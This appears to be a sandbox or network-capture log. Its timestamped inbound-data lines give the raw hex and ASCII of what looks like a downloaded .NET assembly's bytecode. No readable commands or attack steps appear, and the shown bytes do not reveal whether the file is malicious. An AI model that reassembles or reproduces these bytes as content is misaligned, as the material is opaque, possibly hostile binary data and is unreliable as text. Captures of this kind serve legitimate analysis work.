2023-11-18 09:02:33 UTC	25	IN	Data Raw: 09 00 70 73 4a 00 00 0a 7a 7e 3c 00 00 0a 0a 28 92 00 00 0a 03 72 65 09 00 70 28 9b 00 00 0a 6f 95 00 00 0a 0b 14 0c 04 2c 16 28 92 00 00 0a 04 72 65 09 00 70 28 9b 00 00 0a 6f 95 00 00 0a 0c 02 7b 08 00 00 04 28 2b 06 00 06 07 08 12 00 28 97 05 00 06 0d 09 2c 0e 09 06 15 28 6d 03 00 06 73 01 04 00 06 7a de 1a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 06 28 a1 05 00 06 7e 3c 00 00 0a 0a dc 2a 01 10 00 00 02 00 14 00 59 6d 00 1a 00 00 00 00 13 30 02 00 29 00 00 00 08 00 00 11 02 7b 08 00 00 04 28 2b 06 00 06 03 2d 03 16 2b 01 15 28 f2 05 00 06 0a 06 2c 0d 06 02 6f e1 00 00 06 73 01 04 00 06 7a 2a 46 02 7b 08 00 00 04 28 2b 06 00 06 28 f3 05 00 06 2a 46 02 7b 08 00 00 04 28 2b 06 00 06 28 f4 05 00 06 2a 22 03 04 28 93 00 00 06 2a 36 02 03 28 6a 03 00 06 28 f6 Data Ascii: psJz~<(rep(o,(rep(o{(+(,(msz~<(=,(~<Ym0){(+-+(,oszF{(+(F{(+("(*6(j(
2023-11-18 09:02:33 UTC	27	IN	Data Raw: 11 08 12 09 12 0a 28 96 00 00 06 11 09 08 32 ea 11 09 08 2e 0b 72 27 0e 00 70 73 02 04 00 06 7a 11 0a 11 09 2e 0b 72 6f 0e 00 70 73 02 04 00 06 7a de 0c 11 07 2c 07 11 07 6f 45 00 00 0a dc 11 04 13 0b de 14 09 2c 06 09 6f 45 00 00 0a dc 06 2c 06 06 6f 45 00 00 0a dc 11 0b 2a 00 00 41 4c 00 00 02 00 00 00 0e 01 00 00 4b 00 00 00 59 01 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 cf 00 00 00 9c 00 00 00 6b 01 00 00 0a 00 00 00 00 00 00 00 02 00 00 00 33 00 00 00 42 01 00 00 75 01 00 00 0a 00 00 00 00 00 00 00 13 30 03 00 2f 00 00 00 2f 00 00 11 02 2d 01 2a 16 0a 2b 20 06 17 58 20 ff 00 00 00 5d d2 0b 02 06 07 9c 02 06 8f c1 00 00 01 25 47 07 61 d2 52 06 17 58 0a 06 02 8e 69 32 da 2a 00 1b 30 06 00 67 00 00 00 30 00 00 11 28 b3 00 00 0a 0a 06 6f b4 00 00 0a 02 Data Ascii: (2.r'psz.ropsz,oE,oE,oEALKYk3Bu0//-+ X ]%GaRXi2*0g0(o
2023-11-18 09:02:33 UTC	28	IN	Data Raw: de 05 00 06 26 2a 66 02 7b 08 00 00 04 28 2b 06 00 06 03 04 7e 3c 00 00 0a 28 df 05 00 06 26 2a 62 02 7b 08 00 00 04 28 2b 06 00 06 03 7e 3c 00 00 0a 28 e8 05 00 06 26 2a 6e 1f 10 03 7e 3c 00 00 0a 28 e3 05 00 06 25 2d 0a 02 03 14 fe 03 7d 0d 00 00 04 2a 36 02 2d 01 2a 02 03 6f bb 00 00 0a 26 2a 00 1b 30 03 00 34 01 00 00 35 00 00 11 17 0a 16 0b 73 4f 00 00 0a 0c 02 14 6f 3f 01 00 06 de 12 26 08 72 01 0f 00 70 28 a7 00 00 06 17 0b 16 0a de 00 00 28 91 05 00 06 20 70 fd 2d 00 32 0a 02 16 14 6f 3e 01 00 06 2b 07 02 14 6f 3d 01 00 06 de 12 26 08 72 3d 0f 00 70 28 a7 00 00 06 17 0b 16 0a de 00 00 02 14 6f 3c 01 00 06 de 12 26 08 72 7b 0f 00 70 28 a7 00 00 06 17 0b 16 0a de 00 00 02 14 6f 3b 01 00 06 de 12 26 08 72 b3 0f 00 70 28 a7 00 00 06 17 0b 16 0a de 00 Data Ascii: &f{(+~<(&b{(+~<(&n~<(%-}6-o&045sOo?&rp(( p-2o>+o=&r=p(o<&r{p(o;&rp(
2023-11-18 09:02:33 UTC	29	IN	Data Raw: 0a 16 0b 06 12 01 28 5f 00 00 0a 28 b0 04 00 06 0c 16 28 b1 04 00 06 16 28 e1 05 00 06 1f 15 fe 01 0d de 11 08 28 b1 04 00 06 dc 07 2c 06 06 28 60 00 00 0a dc 09 2a 01 1c 00 00 02 00 1c 00 0d 29 00 07 00 00 00 00 02 00 08 00 28 30 00 0a 00 00 00 00 13 30 07 00 97 02 00 00 38 00 00 11 0e 04 7b 06 02 00 04 0a 06 1b 33 06 7e 8b 00 00 0a 2a 14 0b 0e 04 7b 05 02 00 04 1f 0d 2e 10 0e 04 28 87 03 00 06 0b 07 04 28 91 03 00 06 0a 04 20 00 01 00 00 6a 28 36 05 00 06 2c 09 02 03 05 6f 0f 01 00 06 2a 06 17 59 45 04 00 00 00 c8 00 00 00 80 00 00 00 30 02 00 00 0a 00 00 00 06 1f 0a 2e 6d 38 26 02 00 00 0e 04 7b 05 02 00 04 1f 09 33 1d 0e 04 7b 06 02 00 04 19 33 13 02 03 05 6f 0f 01 00 06 73 bf 00 00 0a 8c 5e 00 00 01 2a 02 03 05 16 14 16 16 6f 10 01 00 06 69 0c 08 8d Data Ascii: (_((((,(`)(008{3~{.(( j(6,oYE0.m8&{3{3os^oi
2023-11-18 09:02:33 UTC	30	IN	Data Raw: 04 8c b5 00 00 01 a2 73 e6 01 00 06 28 09 02 00 06 02 7b 08 00 00 04 3a 13 01 00 00 dd 92 00 00 00 7e 3c 00 00 0a 0a 28 5a 00 00 0a 6f 5b 00 00 0a 0c 28 5c 00 00 0a 1e 33 15 12 00 21 1b e4 07 44 63 0d df b7 08 6e 60 28 5d 00 00 0a 2b 0e 12 00 20 1b e4 07 44 08 60 28 5e 00 00 0a 16 0d 05 1f 20 6a 28 36 05 00 06 2d 04 09 17 60 0d 05 21 00 00 00 00 00 00 02 00 28 36 05 00 06 2c 04 09 18 60 0d 03 28 6a 03 00 06 04 28 6a 03 00 06 0e 04 09 12 00 28 88 05 00 06 0b 07 2c 08 07 14 73 01 04 00 06 7a 02 06 17 73 2c 06 00 06 7d 08 00 00 04 dc 02 7b 08 00 00 04 13 04 16 13 05 11 04 12 05 28 5f 00 00 0a de 0c 11 05 2c 07 11 04 28 60 00 00 0a dc 14 1f 09 14 14 14 14 02 7b 08 00 00 04 03 1d 8d 1c 00 00 01 25 16 d0 06 00 00 02 28 3e 00 00 0a a2 25 17 03 a2 25 18 04 a2 25 Data Ascii: s({:~<(Zo[(\3!Dcn`(]+ D`(^ j(6-`!(6,`(j(j(,szs,}{(_,(`{%(>%%%
2023-11-18 09:02:33 UTC	32	IN	Data Raw: 00 04 02 14 7d 21 00 00 04 02 17 7d 28 00 00 04 2a 1b 30 02 00 11 00 00 00 00 00 00 00 02 16 28 cc 00 00 06 de 07 02 28 14 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 00 00 09 09 00 07 00 00 00 00 2a 02 03 04 05 28 69 03 00 06 2a 3a 02 17 6f 4e 01 00 06 02 28 c6 00 00 0a 2a 7a 02 7b 2a 00 00 04 2c 15 d0 08 00 00 02 28 3e 00 00 0a 6f 3f 00 00 0a 73 40 00 00 0a 7a 2a 42 02 7b 2a 00 00 04 2d 07 02 17 7d 2a 00 00 04 2a 00 00 1b 30 02 00 11 00 00 00 00 00 00 00 02 16 6f 4e 01 00 06 de 07 02 28 14 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 00 00 09 09 00 07 00 00 00 00 13 30 02 00 4d 00 00 00 1b 00 00 11 02 1f 64 2e 13 02 1f 65 2e 14 02 20 04 02 00 00 33 12 72 2d 13 00 70 2a 72 59 13 00 70 2a 72 85 13 00 70 2a 7e 2b 00 00 04 2d 02 14 2a 02 20 ff 00 00 00 5f 0a 06 Data Ascii: }!}(0(((i:oN(z{,(>o?s@zB{-}*0oN(0Md.e. 3r-prYprp~+- _
2023-11-18 09:02:33 UTC	33	IN	Data Raw: 1f 1d 8d bd 00 00 01 25 16 72 d9 14 00 70 a2 25 17 72 f3 14 00 70 a2 25 18 72 13 15 00 70 a2 25 19 72 3d 15 00 70 a2 25 1a 72 6f 15 00 70 a2 25 1b 72 8b 15 00 70 a2 25 1c 72 b1 15 00 70 a2 25 1d 72 e3 15 00 70 a2 25 1e 72 ff 15 00 70 a2 25 1f 09 72 49 16 00 70 a2 25 1f 0a 72 61 16 00 70 a2 25 1f 0b 72 7f 16 00 70 a2 25 1f 0c 72 c1 16 00 70 a2 25 1f 0d 72 e5 16 00 70 a2 25 1f 0e 72 17 17 00 70 a2 25 1f 0f 72 51 17 00 70 a2 25 1f 10 72 73 17 00 70 a2 25 1f 11 72 a1 17 00 70 a2 25 1f 12 72 d9 17 00 70 a2 25 1f 13 72 07 18 00 70 a2 25 1f 14 72 2b 18 00 70 a2 25 1f 15 72 4f 18 00 70 a2 25 1f 16 72 93 18 00 70 a2 25 1f 17 72 d1 18 00 70 a2 25 1f 18 72 fb 18 00 70 a2 25 1f 19 72 3b 19 00 70 a2 25 1f 1a 72 6f 19 00 70 a2 25 1f 1b 72 9d 19 00 70 a2 25 1f 1c 72 c7 Data Ascii: %rp%rp%rp%r=p%rop%rp%rp%rp%rp%rIp%rap%rp%rp%rp%rp%rQp%rsp%rp%rp%rp%r+p%rOp%rp%rp%rp%r;p%rop%rp%r
2023-11-18 09:02:33 UTC	34	IN	Data Raw: 6f a0 00 00 0a 04 2c 13 02 04 6f d5 00 00 0a 02 04 6f 59 02 00 06 7d cf 00 00 04 05 2c 07 02 05 28 88 01 00 06 04 1d 14 05 02 14 14 14 14 73 e6 01 00 06 28 09 02 00 06 2a 56 02 2d 0b 72 83 1b 00 70 73 4a 00 00 0a 7a 02 6f 70 01 00 06 2a 7a 02 7b d6 00 00 04 2c 15 d0 12 00 00 02 28 3e 00 00 0a 6f 3f 00 00 0a 73 40 00 00 0a 7a 2a 00 1b 30 0c 00 aa 00 00 00 43 00 00 11 02 7b cc 00 00 04 1f 0c 14 02 7b d5 00 00 04 02 14 14 14 18 8d 1c 00 00 01 25 16 03 8c b3 00 00 01 a2 25 17 02 7b d6 00 00 04 8c b3 00 00 01 a2 73 e6 01 00 06 28 09 02 00 06 16 0a 02 7b d6 00 00 04 2d 51 03 2c 4e 14 0b 02 7b ce 00 00 04 2c 16 02 7b ce 00 00 04 6f d6 00 00 0a 75 4a 00 00 02 0b de 03 26 de 00 07 2c 12 07 17 7d 1a 02 00 04 02 14 7d ce 00 00 04 17 0a de 2d 02 14 28 82 01 00 06 02 Data Ascii: o,ooY},(s(V-rpsJzopz{,(>o?s@z*0C{{%%{s({-Q,N{,{ouJ&,}}-(
2023-11-18 09:02:33 UTC	36	IN	Data Raw: 02 7b ce 00 00 04 2c 18 02 7b ce 00 00 04 6f e1 00 00 0a 2c 0b 72 61 1c 00 70 73 bd 00 00 0a 7a 03 2c 19 03 7b f8 02 00 04 02 7b cc 00 00 04 2e 0b 72 c9 1c 00 70 73 ca 00 00 0a 7a 02 03 7d d5 00 00 04 2a 03 2c 0c 02 03 6f 2a 05 00 06 28 82 01 00 06 02 03 7d d5 00 00 04 2a 1e 02 28 87 01 00 06 2a 36 02 03 74 66 00 00 02 28 88 01 00 06 2a 00 1b 30 06 00 d8 00 00 00 48 00 00 11 02 28 70 01 00 06 02 7b cc 00 00 04 0a 06 7b 41 01 00 04 0b 06 2c 03 07 2d 0b 72 41 1d 00 70 73 02 04 00 06 7a 14 0c 14 0d 02 7b cb 00 00 04 13 04 02 7b cf 00 00 04 20 e8 03 00 00 5a 13 05 14 13 06 2b 35 07 06 11 04 11 06 11 05 12 04 6f e5 00 00 06 0d 09 13 06 09 2c 12 08 2d 06 73 dc 00 00 0a 0c 08 09 6f dd 00 00 0a 14 0d 11 04 2c 09 11 04 6f 70 00 00 0a 13 04 11 04 2c 0a 11 04 6f 74 Data Ascii: {,{o,rapsz,{{.rpsz},o(}(6tf(*0H(p{{A,-rApsz{{ Z+5o,-so,op,ot
2023-11-18 09:02:33 UTC	37	IN	Data Raw: 2c 13 02 7b d2 00 00 04 2c 0b 02 7b d2 00 00 04 6f 0a 05 00 06 02 28 74 01 00 06 02 7b d3 00 00 04 2d 01 2a 02 7b cc 00 00 04 7b 41 01 00 04 0a 02 7b d3 00 00 04 6f e3 00 00 0a 0c 2b 53 12 02 28 e4 00 00 0a 0d 09 2c 48 09 7b ec 02 00 04 13 04 11 04 2c 3c 06 09 6f e8 00 00 06 0b 07 16 fe 01 03 5f 2c 19 28 1a 00 00 06 20 7f d2 2d 00 32 0d 11 04 28 31 06 00 06 28 a9 05 00 06 0b 04 2d 10 07 2c 0d 07 06 6f e1 00 00 06 73 01 04 00 06 7a 12 02 28 e5 00 00 0a 2d a4 de 0e 12 02 fe 16 1d 00 00 1b 6f 45 00 00 0a dc 2a 00 00 01 10 00 00 02 00 43 00 60 a3 00 0e 00 00 00 00 1e 02 28 70 01 00 06 2a 36 02 28 70 01 00 06 02 7b d1 00 00 04 2a 3a 02 28 70 01 00 06 02 03 7d d1 00 00 04 2a 36 02 28 70 01 00 06 02 7b d0 00 00 04 2a 52 02 28 70 01 00 06 02 03 7d d0 00 00 04 02 Data Ascii: ,{,{o(t{-{{A{o+S(,H{,<o_,( -2(1(-,osz(-oEC`(p6(p{:(p}6(p{R(p}
2023-11-18 09:02:33 UTC	38	IN	Data Raw: 0c 01 00 0a 0a 03 6f 0a 01 00 0a 7e 0b 01 00 0a 6f 0c 01 00 0a 0b 03 6f 0d 01 00 0a 6f 0e 01 00 0a 0c 2b 27 08 6f 39 00 00 0a 74 55 00 00 01 0d 09 07 6f 0f 01 00 0a a5 b3 00 00 01 2d 0d 09 06 16 8c b3 00 00 01 6f 11 01 00 0a 08 6f 55 00 00 0a 2d d1 de 14 08 75 34 00 00 01 13 04 11 04 2c 07 11 04 6f 45 00 00 0a dc 03 6f 12 01 00 0a 2a 01 10 00 00 02 00 2e 00 33 61 00 14 00 00 00 00 1e 02 28 c3 00 00 0a 2a 1e 02 28 13 01 00 0a 2a 3a 02 28 c3 01 00 06 02 03 7d e8 00 00 04 2a 1e 02 7b e8 00 00 04 2a 22 02 03 7d e8 00 00 04 2a 92 02 28 c3 01 00 06 02 03 7d e9 00 00 04 02 04 7d ea 00 00 04 02 05 7d ec 00 00 04 02 0e 04 7d ed 00 00 04 2a 92 02 28 c3 01 00 06 02 03 7d e9 00 00 04 02 04 7d eb 00 00 04 02 05 7d ec 00 00 04 02 0e 04 7d ed 00 00 04 2a 1e 02 7b e9 00 Data Ascii: o~ooo+'o9tUo-ooU-u4,oEo.3a((:(}{"}(}}}}(}}}}{
2023-11-18 09:02:33 UTC	40	IN	Data Raw: 0c 02 7c 59 01 00 04 08 07 28 08 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 58 00 00 11 02 7b 59 01 00 04 0a 06 0b 07 03 28 17 01 00 0a 74 64 00 00 01 0c 02 7c 59 01 00 04 08 07 28 08 00 00 2b 0a 06 07 33 df 2a 1a 7e 2d 01 00 04 2a 42 02 28 fb 01 00 06 1b 28 77 00 00 0a 16 fe 01 2a 1a 7e 2f 01 00 04 2a 42 02 28 fd 01 00 06 1b 28 77 00 00 0a 16 fe 01 2a 3e 02 2d 06 7e 2e 01 00 04 2a 7e 30 01 00 04 2a 00 00 00 13 30 03 00 29 00 00 00 59 00 00 11 02 7b 61 01 00 04 0a 06 0b 07 03 28 15 01 00 0a 74 65 00 00 01 0c 02 7c 61 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 59 00 00 11 02 7b 61 01 00 04 0a 06 0b 07 03 28 17 01 00 0a 74 65 00 00 01 0c 02 7c 61 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 22 02 14 Data Ascii: \|Y(+30)X{Y(td\|Y(+3~-B((w~/B((w>-~.~00)Y{a(te\|a(+30)Y{a(te\|a(+3"
2023-11-18 09:02:33 UTC	41	IN	Data Raw: 00 00 0a 7a 03 2d 0b 72 af 1f 00 70 73 4a 00 00 0a 7a 03 7b 36 01 00 04 17 2e 10 72 c7 1f 00 70 72 af 1f 00 70 73 bc 00 00 0a 7a 04 2d 0b 72 0b 20 00 70 73 4a 00 00 0a 7a 05 2d 0b 72 31 11 00 70 73 4a 00 00 0a 7a 02 7b 41 01 00 04 0a 06 2d 0b 72 2b 20 00 70 73 bd 00 00 0a 7a 14 0b 06 03 04 05 6f 47 01 00 06 0b 16 0c 2b 35 0e 05 2c 1e 0e 05 02 05 03 04 0e 04 06 07 6f 49 01 00 06 06 07 6f 4a 01 00 06 08 6f fa 02 00 06 2c 20 08 2c 0c 0e 06 16 32 07 0e 06 28 6a 00 00 0a 0e 04 2c 0d 06 07 0e 04 12 02 6f 48 01 00 06 2d be de 39 0d 02 7b 46 01 00 04 28 3b 05 00 06 2c 1e 28 57 00 00 0a 72 7d 20 00 70 17 8d 1c 00 00 01 25 16 09 a2 28 40 05 00 06 28 b2 04 00 06 fe 1a 07 2c 07 06 07 6f 4b 01 00 06 dc 2a 01 1c 00 00 00 00 74 00 52 c6 00 2e 32 00 00 01 02 00 74 00 80 Data Ascii: z-rpsJz{6.rprpsz-r psJz-r1psJz{A-r+ pszoG+5,oIoJo, ,2(j,oH-9{F(;,(Wr} p%(@(,oK*tR.2t
2023-11-18 09:02:33 UTC	42	IN	Data Raw: 35 01 00 0a 0d 09 1f 27 35 0c 09 1f 22 2e 16 09 1f 27 2e 11 2b 3a 09 1f 3b 2e 0a 09 1f 3d 2e 18 09 1f 5c 33 2b 07 1f 5c 6f 53 00 00 0a 26 07 09 6f 53 00 00 0a 26 2b 20 03 2c 0a 07 09 6f 53 00 00 0a 26 2b 13 72 8b 22 00 70 73 ca 00 00 0a 7a 07 09 6f 53 00 00 0a 26 08 17 58 0c 08 06 32 9d 07 6f 56 00 00 0a 2a 00 00 1b 30 07 00 7c 00 00 00 61 00 00 11 02 2d 02 14 2a 73 4f 00 00 0a 0a 02 6f 36 01 00 0a 0b 2b 4d 07 6f 37 01 00 0a 0c 06 72 df 22 00 70 1a 8d 1c 00 00 01 25 16 12 02 28 38 01 00 0a 16 28 20 02 00 06 a2 25 17 1f 3d 8c d9 00 00 01 a2 25 18 12 02 28 39 01 00 0a 17 28 20 02 00 06 a2 25 19 1f 3b 8c d9 00 00 01 a2 6f 3a 01 00 0a 26 07 6f 55 00 00 0a 2d ab de 0a 07 2c 06 07 6f 45 00 00 0a dc 06 6f 56 00 00 0a 2a 01 10 00 00 02 00 12 00 59 6b 00 0a 00 00 Data Ascii: 5'5".'.+:;.=.\3+\oS&oS&+ ,oS&+r"pszoS&X2oV0\|a-sOo6+Mo7r"p%(8( %=%(9( %;o:&oU-,oEoV*Yk
2023-11-18 09:02:33 UTC	44	IN	Data Raw: 01 10 00 00 02 00 2e 00 8e bc 00 0a 00 00 00 00 5a 02 7b 41 01 00 04 2d 02 16 2a 02 7b 41 01 00 04 6f e4 00 00 06 2a 56 02 7b 41 01 00 04 2d 01 2a 02 7b 41 01 00 04 6f e3 00 00 06 2a 1a 28 0d 03 00 06 2a 36 02 28 24 02 00 06 02 7b 37 01 00 04 2a 96 02 28 24 02 00 06 03 2d 06 73 45 01 00 0a 7a 02 7b 36 01 00 04 2c 06 73 44 01 00 0a 7a 02 03 7d 37 01 00 04 2a 36 02 28 24 02 00 06 02 73 6c 01 00 06 2a 1e 02 28 37 02 00 06 2a 66 02 28 24 02 00 06 02 28 08 02 00 06 02 7b 46 01 00 04 03 73 20 08 00 06 2a 66 02 28 24 02 00 06 03 02 28 08 02 00 06 02 7b 46 01 00 04 73 3e 08 00 06 2a 6a 02 28 24 02 00 06 03 02 28 08 02 00 06 02 7b 46 01 00 04 04 73 3f 08 00 06 2a 6a 02 28 24 02 00 06 03 04 02 28 08 02 00 06 02 7b 46 01 00 04 73 48 08 00 06 2a 6e 02 28 24 02 00 06 Data Ascii: .Z{A-{AoV{A-{Ao(6(${7($-sEz{6,sDz}76($sl(7f($({Fs f($({Fs>j($({Fs?j($({FsH*n($
2023-11-18 09:02:33 UTC	45	IN	Data Raw: 00 00 00 1b 30 02 00 bc 00 00 00 6a 00 00 11 0f 02 28 6b 00 00 0a 2d 08 02 28 24 02 00 06 2b 10 02 7b 62 01 00 04 2c 08 0f 02 28 6d 00 00 0a 2a 03 16 2f 0b 72 04 28 00 70 73 ca 00 00 0a 7a 03 2d 04 16 0a 2b 12 03 1f 0a 5b 1f 64 28 4f 01 00 0a 0a 06 2d 03 1f 64 0a 28 b0 00 00 0a 0b 02 7b 3d 01 00 04 28 50 01 00 0a 0c 08 2c 0d 02 7b 3e 01 00 04 2d 05 17 13 06 de 4e de 11 08 2c 0d 02 7b 3d 01 00 04 28 60 00 00 0a 16 0c dc 06 2d 02 16 2a 28 b0 00 00 0a 0d 12 03 07 28 88 00 00 0a 13 04 12 04 28 51 01 00 0a 13 05 11 05 23 00 00 00 00 00 00 00 00 32 06 11 05 03 6c 37 02 16 2a 06 28 6a 00 00 0a 2b 96 11 06 2a 01 10 00 00 02 00 5b 00 12 6d 00 11 00 00 00 00 13 30 04 00 51 00 00 00 0f 00 00 11 03 28 6f 00 00 0a 2c 02 04 2a 02 03 12 00 6f 52 01 00 0a 2c 02 06 2a 02 Data Ascii: 0j(k-($+{b,(m/r(psz-+[d(O-d({=(P,{>-N,{=(`-(((Q#2l7(j+[m0Q(o,oR,
2023-11-18 09:02:33 UTC	46	IN	Data Raw: 1f 02 00 06 0a 06 72 94 2c 00 70 14 28 49 02 00 06 0b 07 2c 14 d0 0b 00 00 02 28 3e 00 00 0a 07 17 28 4a 02 00 06 0c 2b 02 14 0c 06 72 a0 2c 00 70 16 13 0b 12 0b 28 3b 01 00 0a 28 49 02 00 06 28 86 03 00 06 0d 08 75 0b 00 00 02 2c 15 02 02 7b 46 01 00 04 08 a5 0b 00 00 02 60 7d 46 01 00 04 2b 15 09 2d 12 02 02 7b 46 01 00 04 28 85 02 00 06 60 7d 46 01 00 04 06 72 be 2c 00 70 16 13 0b 12 0b 28 3b 01 00 0a 28 49 02 00 06 28 86 03 00 06 2d 33 7e 32 01 00 04 13 0c 16 13 0b 11 0c 12 0b 28 5f 00 00 0a 02 02 7b 46 01 00 04 7e 34 01 00 04 60 7d 46 01 00 04 de 0c 11 0b 2c 07 11 0c 28 60 00 00 0a dc 02 7b 46 01 00 04 21 00 00 00 00 00 00 01 00 28 36 05 00 06 13 04 06 13 05 02 7b 37 01 00 04 13 06 11 04 39 90 00 00 00 28 46 01 00 0a 73 47 01 00 0a 13 05 06 6f 36 01 Data Ascii: r,p(I,(>(J+r,p(;(I(u,{F`}F+-{F(`}Fr,p(;(I(-3~2(_{F~4`}F,(`{F!(6{79(FsGo6
2023-11-18 09:02:33 UTC	48	IN	Data Raw: 00 06 2c 0f 11 14 17 60 13 14 11 14 1f fb 5f 13 14 2b 06 11 14 18 60 13 14 11 08 2c 07 11 14 1f 40 60 13 14 02 7b 41 01 00 04 11 09 02 7b 4a 01 00 04 02 7b 46 01 00 04 11 14 11 12 11 11 6f de 00 00 06 06 72 de 31 00 70 14 28 49 02 00 06 0b 07 2c 0c 02 07 28 86 03 00 06 7d 51 01 00 04 06 72 04 2d 00 70 14 28 49 02 00 06 13 15 11 15 2c 35 28 92 00 00 0a 11 15 6f 95 00 00 0a 13 17 12 17 11 17 8e 69 17 58 28 0a 00 00 2b 02 7b 41 01 00 04 11 17 17 6f 36 01 00 06 02 17 7d 44 01 00 04 38 b7 00 00 00 06 72 ec 2c 00 70 14 28 49 02 00 06 13 18 11 18 2c 49 14 13 19 11 18 12 19 28 54 02 00 06 13 1a 11 1a 2d 20 28 57 00 00 0a 72 f4 31 00 70 17 8d 1c 00 00 01 25 16 11 19 a2 28 40 05 00 06 73 5d 01 00 0a 7a 02 7b 41 01 00 04 11 1a 16 6f 36 01 00 06 02 16 7d 44 01 00 04 Data Ascii: ,`_+`,@`{A{J{For1p(I,(}Qr-p(I,5(oiX(+{Ao6}D8r,p(I,I(T- (Wr1p%(@s]z{Ao6}D
2023-11-18 09:02:33 UTC	49	IN	Data Raw: 02 7b 5b 01 00 04 6f 39 01 00 06 02 7b 55 01 00 04 2c 11 02 7b 41 01 00 04 02 7b 5c 01 00 04 6f 3a 01 00 06 02 7b 57 01 00 04 2c 11 02 7b 41 01 00 04 02 7b 5e 01 00 04 6f 3c 01 00 06 02 7b 56 01 00 04 2c 11 02 7b 41 01 00 04 02 7b 5d 01 00 04 6f 3b 01 00 06 02 7b 59 01 00 04 2c 11 02 7b 41 01 00 04 02 7b 60 01 00 04 6f 3f 01 00 06 28 61 01 00 0a 13 1e 11 1e 14 28 4e 01 00 0a 2c 24 06 72 30 35 00 70 17 13 0b 12 0b 28 3b 01 00 0a 28 49 02 00 06 28 86 03 00 06 2c 08 02 11 1e 6f 62 01 00 0a 02 11 16 7d 36 01 00 04 14 13 1f 02 17 12 1f 28 28 02 00 06 02 19 11 1f 14 14 14 14 11 06 17 8d 1c 00 00 01 25 16 11 05 a2 73 e6 01 00 06 28 09 02 00 06 de 0b 26 02 11 16 7d 36 01 00 04 fe 1a de 09 26 02 6f 3e 01 00 0a fe 1a 2a 41 7c 00 00 02 00 00 00 e0 00 00 00 1d 00 00 Data Ascii: {[o9{U,{A{\o:{W,{A{^o<{V,{A{]o;{Y,{A{`o?(a(N,$r05p(;(I(,ob}6((%s(&}6&o>*A\|
2023-11-18 09:02:33 UTC	50	IN	Data Raw: 06 72 c8 39 00 70 0a 07 2d 06 72 1a 3a 00 70 0b 28 71 00 00 0a 72 4a 3a 00 70 18 8d 1c 00 00 01 25 16 06 a2 25 17 07 a2 28 40 05 00 06 2a 14 2a 6a 7e 35 01 00 04 2d 05 04 03 51 16 2a 7e 35 01 00 04 02 03 04 6f 11 02 00 06 2a 56 7e 35 01 00 04 2d 01 2a 7e 35 01 00 04 02 03 6f 12 02 00 06 2a 00 00 13 30 03 00 5d 00 00 00 6f 00 00 11 72 5a 3a 00 70 0a 06 14 12 01 28 83 02 00 06 2d 0f 06 14 28 5c 05 00 06 0b 06 07 28 84 02 00 06 07 2d 0a 21 08 40 00 00 00 0c 00 00 2a d0 0b 00 00 02 28 3e 00 00 0a 07 6f 56 00 00 0a 17 28 4a 02 00 06 0c 08 75 0b 00 00 02 2c 07 08 a5 0b 00 00 02 2a 21 08 40 00 00 00 0c 00 00 2a 00 00 00 1b 30 02 00 24 00 00 00 70 00 00 11 7e 32 01 00 04 0a 16 0b 06 12 01 28 5f 00 00 0a 7e 34 01 00 04 0c de 0a 07 2c 06 06 28 60 00 00 0a dc 08 2a Data Ascii: r9p-r:p(qrJ:p%%(@*j~5-Q~5oV~5-~5o0]orZ:p(-(\(-!@(>oV(Ju,!@0$p~2(_~4,(`*
2023-11-18 09:02:33 UTC	52	IN	Data Raw: 72 d2 3e 00 70 28 74 00 00 0a 17 6f 74 01 00 0a 10 00 02 72 d2 3e 00 70 28 74 00 00 0a 6f 7a 00 00 0a 28 75 01 00 0a 10 00 03 2c 08 02 28 76 01 00 0a 10 00 02 2a 4e 02 28 24 02 00 06 02 72 f2 3e 00 70 14 6f 77 01 00 0a 2a 52 02 28 24 02 00 06 02 03 16 8d bd 00 00 01 6f 77 01 00 0a 2a 00 00 00 13 30 06 00 e9 02 00 00 72 00 00 11 02 28 24 02 00 06 02 7b 36 01 00 04 17 2e 06 73 44 01 00 0a 7a 1b 8d bd 00 00 01 0a 04 2d 08 16 8d bd 00 00 01 10 02 04 06 16 6f 78 01 00 0a 03 28 71 00 00 0a 6f 79 01 00 0a 0b 07 28 86 08 00 06 0c 08 20 9d 2a 5e 75 35 69 08 20 db c1 31 2e 35 26 08 20 c6 75 57 1a 3b 4f 01 00 00 08 20 1a b0 7a 2c 3b 05 01 00 00 08 20 db c1 31 2e 3b 0f 01 00 00 38 6b 02 00 00 08 20 f1 68 01 33 35 1b 08 20 9c a9 d9 32 3b cd 00 00 00 08 20 f1 68 01 33 Data Ascii: r>p(totr>p(toz(u,(vN($r>powR($ow0r(${6.sDz-ox(qoy( ^u5i 1.5& uW;O z,; 1.;8k h35 2; h3
2023-11-18 09:02:33 UTC	53	IN	Data Raw: 0a 7e 8a 01 00 0a d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 8b 01 00 0a d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 8c 01 00 0a d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 8d 01 00 0a d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 8e 01 00 0a d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 8f 01 00 0a d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 90 01 00 0a d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 91 01 00 0a d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 92 01 00 0a d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 93 01 00 0a d0 b5 00 00 01 28 Data Ascii: ~(>o\|&o~(>o\|&o~(>o\|&o~(>o\|&o~(>o\|&o~(>o\|&o~(>o\|&o~(>o\|&o~(>o\|&o~(
